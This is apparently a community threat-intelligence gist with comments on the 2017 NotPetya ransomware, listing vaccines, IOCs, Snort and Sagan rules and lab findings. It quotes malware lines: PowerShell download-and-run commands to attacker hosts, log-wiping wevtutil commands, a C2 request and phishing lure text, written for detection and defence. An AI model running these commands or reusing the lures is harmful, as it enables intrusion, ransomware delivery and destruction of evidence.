Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C

Ransomware attack.

About

This gist was built by the community of the researchers and was scribed by Kir and Igor from the QIWI/Vulners. We are grateful for the help of all those who sent us the data, links and information. Together we can make this world a better place!

Gist updates

Recent news, blog posts and mentions

Recent news from THN/Threatpost/Blogs

Research list

Helpful vaccine (not killswitch!)

Looks like if you block C:\Windows\perfc.dat from writing/executing - stops #Petya. Is used for rundll32 import.
https://twitter.com/HackingDave/status/879779361364357121
Local kill switch - create file "C:\Windows\perfc"
It kills WMI vector. Still need to patch MS17-010 for full protection.

Credits:

Group Policy Preferences to deploy the NotPetya vaccine

https://eddwatton.wordpress.com/2017/06/27/use-group-policy-preferences-to-deploy-the-notpetya-vaccine/

SCCM vaccine

https://sccm-zone.com/securing-against-goldeneye-petya-notpetya-petwrap-with-sccm-7e4516da8a81

Ransom

Infected with #Petya? DON'T PAY RANSOM, You wouldn't get your files back. Email used by criminals has been Suspended.

https://posteo.de/blog/info-zur-ransomware-petrwrappetya-betroffenes-postfach-bereits-seit-mittag-gesperrt

Bitcoin wallet monitoring

https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

Samples:

Archive password: virus

Thanks to the https://twitter.com/OxFemale for the initial malware body.

Source code:

  • Archive password: virus

Thanks to the @Sn0wFX_:

Initial vector:

Ransomware includes:

  • Modified EternalBlue exploit
  • A vulnerability in a third-party Ukrainian software product
  • A second SMB network exploit

Origin (NO PROOF):

Petya was known to be RaaS (Ransomware-as-a-Service), selling on Tor hidden services. Looks like WannaCry copycat. Attribution will be hard. https://twitter.com/x0rz/status/879733138792099842

AvP Bypass

Confirmed AvP bypasing trick is being used by Petya ransomware to evade 6 popular anti-virus signatures (script) https://twitter.com/hackerfantastic/status/880012620698451968

https://github.com/HackerFantastic/Public/blob/master/tools/bypassavp.sh

Vulnerabilities/Vectors/Actions:

MS17-010

PSEXEC: %PROGRAMDATA%\dllhost.dat is dropped and is legit PSEXEC bin

Remote WMI, “process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1”

Log clean, «wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:»

Creates a scheduled task that reboots 1 hour after infection. If task removed before the hour, does not reschedule and can buy time

Petya also attempts to kill Exchange & MySQL if they are running.  If you host either of these services and notice them die, this is including in it's infection process (svchost.exe) // by Mike "Bones" Flowers:

Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im Microsoft.Exchange.*
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im MSExchange*
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im sqlserver.exe
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im sqlwriter.exe
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im mysqld.exe
The new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability CVE-2017-0144 (also known as EternalBlue), which was fixed in security update MS17-010 and was also exploited by WannaCrypt to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for CVE-2017-0145 (also known as EternalRomance, and fixed by the same bulletin)

Machines that are patched against these exploits (with security update MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx) or have disabled SMBv1 (https://support.microsoft.com/kb/2696547) are not affected by this particular spreading mechanism

Test local account behavior [NOT TESTED]:

Don't know if you have also noticed, but it only encrypted the MFT records for my test user account profile folders, the default Windows accounts Administrator, default user etc were all untouched, my test account was local so I don't know what behaviour would be expected for domain account profile folders.

100% on the sample used by me and on a standalone computer, user files were encrypted prior to reboot and the malware was not able to escalate privileges to deploy the MFT encryption payload, no instructions were deposited about recovering these files

http://imgur.com/a/FhaZx

Possible IP addresses:

185.165.29.78
84.200.16.242
111.90.139.247
95.141.115.108

Email:

wowsmith123456@posteo.net
iva76y3pr@outlook.com         // by WhiteWolfCyber
carmellar4hegp@outlook.com    // by WhiteWolfCyber
amanda44i8sq@outlook.com      // by WhiteWolfCyber
gabrielai59bjg@outlook.com
christagcimrl@outlook.com
amparoy982wa@outlook.com
rachael052bx@outlook.com
sybilm0gdwc@outlook.com
christian.malcharzik@gmail.com

Email forms and attachment:

The subject in this case are formed like that (for targed "targed.emailName@targedDomain.com"):
targed.emailName

The body:
Hello targed.emailName,

You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is 6089

With appreciation!
Prince

Attached file name:
Scan_targed.emailName.doc

Analysis:

Targeted extensions by @GasGeverij

.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.

IOCs

securelist.com

0df7179693755b810403a972f4466afb
42b2ff216d14c2c8387c8eabfb1ab7d0
71b6a493388e7d0b40c83ce903bc6b04
e285b6ce047015943e685e6638bd837e
e595c02185d8e12be347915865270cca

blogs.technet.microsoft.com

34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
9717cfdc2d023812dbc84a941674eb23a2a8ef06
38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
56c03d8e43f50568741704aee482704a4f5005ad

talosintelligence.com

027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998

Droppers sent via email by WhiteWolfCyber:

9B853B8FE232B8DED38355513CFD4F30
CBB9927813FA027AC12D7388720D4771
22053C34DCD54A5E3C2C9344AB47349A702B8CFDB5796F876AEE1B075A670926
1FE78C7159DBCB3F59FF8D410BD9191868DEA1B01EE3ECCD82BCC34A416895B5
EEF090314FBEC77B20E2470A8318FC288B2DE19A23D069FE049F0D519D901B95

Codexgigas team:

a809a63bc5e31670ff117d838522dec433f74bee
bec678164cedea578a7aff4589018fa41551c27f
d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
aba7aa41057c8a6b184ba5776c20f7e8fc97c657
0ff07caedad54c9b65e5873ac2d81b3126754aac
51eafbb626103765d3aedfd098b94d0e77de1196
078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
7ca37b86f4acc702f108449c391dd2485b5ca18c
2bc182f04b935c7e358ed9c9e6df09ae6af47168
1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
82920a2ad0138a2a8efc744ae5849c6dde6b435d

msuice

41f75e5f527a3307b246cadf344d2e07f50508cf75c9c2ef8dc3bae763d18ccf

SNORT rules for the detection by Positive Technologies (ptsecurity.com):

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Unimplemented Trans2 Sub-Command code. Possible ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; byte_test: 2, >, 0x0008, 52, relative, little; pcre: "/\xFFSMB2\x00\x00\x00\x00.{52}(?:\x04|\x09|\x0A|\x0B|\x0C|\x0E|\x11)\x00/"; flowbits: set, SMB.Trans2.SubCommand.Unimplemented; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001254; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] ETERNALBLUE (WannaCry, Petya) SMB MS Windows RCE"; flow: to_server, established; content: "|FF|SMB3|00 00 00 00|"; depth: 9; offset: 4; flowbits: isset, SMB.Trans2.SubCommand.Unimplemented.Code0E; threshold: type limit, track by_src, seconds 60, count 1; reference: cve, 2017-0144; classtype: attempted-admin; sid: 10001255; rev: 3;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Trans2 Sub-Command 0x0E. Likely ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; content: "|0E 00|"; distance: 52; within: 2; flowbits: set, SMB.Trans2.SubCommand.Unimplemented.Code0E; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001256; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Petya ransomware perfc.dat component"; flow: to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content: "|70 00 65 00 72 00 66 00 63 00 2e 00 64 00 61 00 74 00|"; distance:0; classtype:suspicious-filename-detect; sid: 10001443; rev: 1;)

alert tcp any any -> $HOME_NET 445 (msg:"[PT Open] SMB2 Create PSEXESVC.EXE"; flow:to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content:"|50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 45 00 58 00 45|"; distance:0; classtype:suspicious-filename-detect; sid: 10001444; rev:1;)

Sagan log analysis rules for the detection by Quadrant Information Security (quadrantsec.com) - Note: These are NOT Snort/Suricata rules! See http://sagan.io for more details:

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA256 hash detected - Open source"; meta_content: "%sagan%",64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206,ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003121; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA1 hash detected - Open source"; meta_content: "%sagan%",34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,101cc1cb56c407d5b9149f2c3b8523350d23ba84,a809a63bc5e31670ff117d838522dec433f74bee,d5bf3f100e7dbcc434d7c58ebf64052329a60fc2,aba7aa41057c8a6b184ba5776c20f7e8fc97c657,bec678164cedea578a7aff4589018fa41551c27f,078de2dc59ce59f503c63bd61f1ef8353dc7cf5f,0ff07caedad54c9b65e5873ac2d81b3126754aac,51eafbb626103765d3aedfd098b94d0e77de1196,82920a2ad0138a2a8efc744ae5849c6dde6b435d,1b83c00143a1bb2bf16b46c01f36d53fb66f82b5,7ca37b86f4acc702f108449c391dd2485b5ca18c,2bc182f04b935c7e358ed9c9e6df09ae6af47168,9288fb8e96d419586fc8c595dd95353d48e8a060,736752744122a0b5e
e4b95ddad634dd225dc0f73,9288fb8e96d419586fc8c595dd95353d48e8a060,dd52fcc042a44a2af9e43c15a8e520b54128
cdc8; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003122; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery MD5 hash detected - Open source"; meta_content: "%sagan%",71b6a493388e7d0b40c83ce903bc6b04,415fe69bf32634ca98fa07633f4118e1,0487382a4daf8eb9660f1c67e30f8b25,a1d5895f85751dfe67d19cccb51b051a; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003123; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya detected by filename - Open source"; meta_content: "%sagan%",myguy.xls,myguy.exe,BCA9D6.EXE,Order-20062017.doc,myguy.xls.hta; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003124; rev:1;)

Links

Fix suggest by @MrAdz350

If you can boot to a Windows ISO prior to Frist reboot you can use bootrec tool to prevent MBR overwriting as per https://neosmart.net/wiki/fix-mbr

Information about MBRFilter

3skr0 commented Jun 27, 2017

https://twitter.com/JC_DiazGarcia/status/879719578171060228

IP Addresses aparently involved in #petya ransomware cyberattack 84.200.16.242, 95.141.115.108, 111.90.139.247

jivoi commented Jun 27, 2017 edited

More information in RUS https://habrahabr.ru/post/331762/

I analyzed the xls with the help of box-js. I found that it will execute PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', '%APPDATA%\<random>.exe') (where <random> is a random number between 0 and 65535), and then it will call this file with the arguments 1 0 (eg. %APPDATA%\63073.exe 1 0).

What proof do we have that the LokiBot sample has any involvement with this campaign?
C2 comms:
POST /cup/wish.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: coffeinoffice.xyz
Accept: /
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A56F60F4
Content-Length: 216
Connection: close

peasead commented Jun 27, 2017

BTC address: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

3pun0x commented Jun 27, 2017

185.165.29.78 is karo ransomware and not petya!

Owner

vulnersCom commented Jun 27, 2017

185.165.29.78 is karo ransomware and not petya! -----> Plz, share proofed #petya ip list

irenad commented Jun 27, 2017 edited

h11p://84.200.16.242/myguy.xls

File Name            myguy.xls
MD5 Hash Identifier       0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier     736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier                EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size                13893 bytes
File Type              Zip archive data

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(**_'h11p://french-cooking.com/myguy.exe'_**, '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
    10807.exe %APPDATA%\10807.exe" " (PID: 3096)

this is another sample/domain - 'h11p://french-cooking.com/myguy.exe'

Does any one has a sample who can share for lab testing, this way we can get all the forensic analysis of what it does

s1st3r commented Jun 27, 2017

For it to use psexec, it must be dumping the password, so there must be a key dumper for either domain or something....

@vulnersCom
I have tried running the binary on a win7 virtual machine but I get the "not a valid Win32 application" error.

jivoi commented Jun 27, 2017

Local kill-switch - create file "C:\Windows\perfc"
https://twitter.com/ptsecurity/status/879779327579086848

That kill switch method only works on the WMI/PSExec. Not full proof.

Snort rules for detection by PT:

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Unimplemented Trans2 Sub-Command code. Possible ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; byte_test: 2, >, 0x0008, 52, relative, little; pcre: "/\xFFSMB2\x00\x00\x00\x00.{52}(?:\x04|\x09|\x0A|\x0B|\x0C|\x0E|\x11)\x00/"; flowbits: set, SMB.Trans2.SubCommand.Unimplemented; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001254; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] ETERNALBLUE (WannaCry, Petya) SMB MS Windows RCE"; flow: to_server, established; content: "|FF|SMB3|00 00 00 00|"; depth: 9; offset: 4; flowbits: isset, SMB.Trans2.SubCommand.Unimplemented.Code0E; threshold: type limit, track by_src, seconds 60, count 1; reference: cve, 2017-0144; classtype: attempted-admin; sid: 10001255; rev: 3;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Trans2 Sub-Command 0x0E. Likely ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; content: "|0E 00|"; distance: 52; within: 2; flowbits: set, SMB.Trans2.SubCommand.Unimplemented.Code0E; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001256; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Petya ransomware perfc.dat component"; flow: to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content: "|70 00 65 00 72 00 66 00 63 00 2e 00 64 00 61 00 74 00|"; distance:0; classtype:suspicious-filename-detect; sid: 10001443; rev: 1;)

alert tcp any any -> $HOME_NET 445 (msg:"[PT Open] SMB2 Create PSEXESVC.EXE"; flow:to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content:"|50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 45 00 58 00 45|"; distance:0; classtype:suspicious-filename-detect; sid: 10001444; rev:1;)

https://github.com/ptresearch/AttackDetection/blob/master/eternalblue(WannaCry%2CPetya)/eternalblue(WannaCry%2CPetya).rules

Nice collection you've got here. Thanks for sharing!

The ransomware uses pass the hash techique for attack computers in same active directory or cloned machines.

Twitter Bitcoin Bot Monitoring Petya Payments
https://twitter.com/petya_payments

beave commented Jun 28, 2017

*********** Sagan log analysis rules for the detection by Quadrant Information Security (quadrantsec.com) - Note: These are NOT Snort/Suricata rules! See http://sagan.io for more details:

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA256 hash detected - Open source"; meta_content: "%sagan%",64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206,ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003121; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA1 hash detected - Open source"; meta_content: "%sagan%",34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,101cc1cb56c407d5b9149f2c3b8523350d23ba84,a809a63bc5e31670ff117d838522dec433f74bee,d5bf3f100e7dbcc434d7c58ebf64052329a60fc2,aba7aa41057c8a6b184ba5776c20f7e8fc97c657,bec678164cedea578a7aff4589018fa41551c27f,078de2dc59ce59f503c63bd61f1ef8353dc7cf5f,0ff07caedad54c9b65e5873ac2d81b3126754aac,51eafbb626103765d3aedfd098b94d0e77de1196,82920a2ad0138a2a8efc744ae5849c6dde6b435d,1b83c00143a1bb2bf16b46c01f36d53fb66f82b5,7ca37b86f4acc702f108449c391dd2485b5ca18c,2bc182f04b935c7e358ed9c9e6df09ae6af47168,9288fb8e96d419586fc8c595dd95353d48e8a060,736752744122a0b5e
e4b95ddad634dd225dc0f73,9288fb8e96d419586fc8c595dd95353d48e8a060,dd52fcc042a44a2af9e43c15a8e520b54128
cdc8; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003122; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery MD5 hash detected - Open source"; meta_content: "%sagan%",71b6a493388e7d0b40c83ce903bc6b04,415fe69bf32634ca98fa07633f4118e1,0487382a4daf8eb9660f1c67e30f8b25,a1d5895f85751dfe67d19cccb51b051a; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003123; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya detected by filename - Open source"; meta_content: "%sagan%",myguy.xls,myguy.exe,BCA9D6.EXE,Order-20062017.doc,myguy.xls.hta; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003124; rev:1;)

at4r commented Jun 28, 2017

anyone got success to infect win7 vmware machine with the samples?

ashokquaker commented Jun 28, 2017 edited

The MBR file is affected, could the cracker could have tried to alter using machine language as hidden/ Trojan kinda attck? Some more reverse engineering is appreciable.

Thanks for the sample, will be decompiling this tonight

eltetedb commented Jun 28, 2017 edited

Some malicious addresses used to send email with the malicious DOC attached (proofed):

  • gabrielai59bjg @ outlook.com
  • christagcimrl @ outlook.com
  • amparoy982wa @ outlook.com

The subject in this case are formed like that (for targed "targed.emailName@targedDomain.com"):
targed.emailName

The body:
Hello targed.emailName,

You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is 6089

With appreciation!
Prince

Attached file name:
Scan_targed.emailName.doc

b0tmast3r commented Jun 28, 2017 edited

christian.malcharzik@gmail[.]com was found to send emails with the file "Order-20062017.doc" (MD5: 415FE69BF32634CA98FA07633F4118E1) as attachment.

sacx commented Jun 28, 2017 edited

We also found @outlook email to our system with the same message with the following payload

cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://185.165.29.78/~alex/svchost.exe' , '%TEMP%\svchost.exe') & PING -n 15 127.0.0.1>nul & %tmp%\svchost.exe

svchost.exe: https://www.virustotal.com/en/file/71f52862cdf708ca203bd07836838fdd41e51473addff1d0b004d8467281bb21/analysis/

Email addresses was
rachael052bx@outlook.com
sybilm0gdwc@outlook..com

Apparenlty is an automatically generated email: < name ><5 alphanumeric characters>@outlook.com

Had a look at the emails above, only 2 were used elsewhere- https://www.facebook.com/rachel59800 and https://plus.google.com/108180606555454466363

msuiche commented Jun 29, 2017

https://twitter.com/msuiche/status/880041005638180864

41f75e5f527a3307b246cadf344d2e07f50508cf75c9c2ef8dc3bae763d18ccf (Len 0x22b0)

eua1024 commented Jun 29, 2017

Please, add information from https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/

The new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability CVE-2017-0144 (also known as EternalBlue), which was fixed in security update MS17-010 and was also exploited by WannaCrypt to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for CVE-2017-0145 (also known as EternalRomance, and fixed by the same bulletin)

Machines that are patched against these exploits (with security update MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx) or have disabled SMBv1 (https://support.microsoft.com/kb/2696547) are not affected by this particular spreading mechanism

0x4E0x650x6F commented Jun 30, 2017 edited

New delivery sender, mail similar to the others.

Sender:
henrietta9u29jd @ outlook.com

The body:
Whats up targed.emailName,

You will be billed $ 3,2629.51 on your Mastercard balance soon.
View attachment to avoid it.
Password is 5558

Kind thanks,
curt

Attached file name:
Scan_targed.emailName.doc

Macro inside:
Creates a bat file in temp withe the following, and then executes.

powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','%TEMP%\msbus24.exe')" & %tmp%\msbus24.exe

virus total hash:
4efcabdd8946524ada350a0cafccdba7eba905d345c0a6775c3e29567c2fcdb4

Source:
fbbkvm7ezghq4dx3.onion.link (103.198.0.2)

z442a9 commented Jul 2, 2017 edited

Tested this malware in closed lab environment. Executed malware in domain joined Windows 7 machine with local administrator. This same local admin account was in other domain machines except one that I configured differently on purpose. Spreads very quickly in network using psexec and wmic. I also had one domain controller and one workgroup Windows 7 machine with different local admin account than other machines. I wanted to see that will it spread to them too using Eternalblue but malware didn't infect them at all for some reason. Those machines didn't have patch for EternalBlue.

Also noted that it didn't create a perfc file in C:\Windows. It created a empty file named petya in C:\Windows. Petya was the name of a file where I originally executed the malware.

vzhenia commented Jul 3, 2017

Hi! I'm a user of this Medoc software. This April, my Windows Defender found a Trojan:Win32/Rundas.A in Medoc's update package 10.01.168-10.01.169. I have deleted the file and Defender has deleted Trojan. I attach the log of this process, if it can help anyone. I wasn't affected by the attack on 27th June (might be because didn't use Medoc on that day).

Защитник Windows обнаружил вредоносные или иные потенциально нежелательные программы.
Дополнительные сведения см. в:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Rundas.A&threatid=2147717515&enterprise=0
Имя: Trojan:Win32/Rundas.A
ИД: 2147717515
Важность: Критический
Категория: Троян
Путь: file:_C:\Users\User\Documents\ezvit.10.01.168-10.01.169.exe
Происхождение обнаружения: Локальный компьютер
Тип обнаружения: FastPath
Источник обнаружения: Защита в реальном времени:
Пользователь: User-ПК\User
Имя процесса: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
Версия сигнатуры: AV: 1.239.752.0, AS: 1.239.752.0, NIS: 116.88.0.0
Версия модуля: AM: 1.1.13601.0, NIS: 2.1.12706.0

  • System

    • Provider
      [ Name] Microsoft-Windows-Windows Defender
      EventID 1116
      Version 0
      Level 3
      Task 0
      Opcode 0
      Keywords 0x8000000000000000
    • TimeCreated
      [ SystemTime] 2017-04-04T14:10:24.714441000Z
      EventRecordID 806
      Correlation
    • Execution
      [ ProcessID] 1764
      [ ThreadID] 3548
      Channel Microsoft-Windows-Windows Defender/Operational
      Computer User-ПК
    • Security
      [ UserID] S-1-5-18
  • EventData
    Product Name %%827
    Product Version 4.10.14393.953
    Detection ID {74024D2F-D277-4A2F-972E-A11D4B8B85D0}
    Detection Time 2017-04-04T14:10:23.752Z
    Unused
    Unused2
    Threat ID 2147717515
    Threat Name Trojan:Win32/Rundas.A
    Severity ID 5
    Severity Name Критический
    Category ID 8
    Category Name Троян
    FWLink http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Rundas.A&threatid=2147717515&enterprise=0
    Status Code 1
    Status Description
    State 1
    Source ID 3
    Source Name %%818
    Process Name C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
    Detection User User-ПК\User
    Unused3
    Path file:_C:\Users\User\Documents\ezvit.10.01.168-10.01.169.exe
    Origin ID 1
    Origin Name %%845
    Execution ID 1
    Execution Name %%813
    Type ID 8
    Type Name %%862
    Pre Execution Status 0
    Action ID 9
    Action Name %%887
    Unused4
    Error Code 0x00000000
    Error Description Операция успешно завершена.
    Unused5
    Post Clean Status 0
    Additional Actions ID 0
    Additional Actions String No additional actions required
    Remediation User
    Unused6
    Signature Version AV: 1.239.752.0, AS: 1.239.752.0, NIS: 116.88.0.0
    Engine Version AM: 1.1.13601.0, NIS: 2.1.12706.0

Vanuan commented Jul 4, 2017

The 3rd known attack vector is a local news site in Bahmut (Donetsk region):

https://bahmut.com/showpost.php?p=439664&postcount=45

Control server: http://dfkiueswbgfreiwfsd.tk/i/ -> https://ipinfo.io/172.97.69.79 - purevoltage.com VPS, New York

The same server is somehow related to https://www.ukhin.org.ua - institution in Kharkiv (seen in Google):

https://www.ukhin.org.ua/2017Jun12-2017Jun12/192.168.0.35/192.168.0.35.html
Jun 13, 2017 - dfkiueswbgfreiwfsd.tk, 4, 5,400, 0.01%, 0.00%, 100.00%, 01:00:00, 3,600,679, 3.06%. www.odnoklassniki.ru, 4, 5,380, 0.01%, 100.00%, 0.00% ...

eua1024 commented Jul 5, 2017 edited

Please, add link Analysis of TeleBots’ cunning backdoor (https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/)
and information from post

